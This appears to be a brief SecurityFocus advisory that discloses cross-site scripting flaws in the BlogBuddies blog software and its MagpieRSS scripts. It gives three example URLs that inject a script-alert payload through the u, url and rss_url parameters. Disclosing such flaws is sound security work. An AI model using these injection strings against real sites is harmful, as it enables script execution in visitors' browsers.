BlogBuddies Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/computechnix/blogbuddies/
index.php?u="><script>alert("hola vengo a flotar");</script>

http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_debug.php?url="><script>alert("...");</script>

http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_slashbox.php?rss_url="><script>alert("...");</script>


 

Privacy Statement
Copyright 2010, SecurityFocus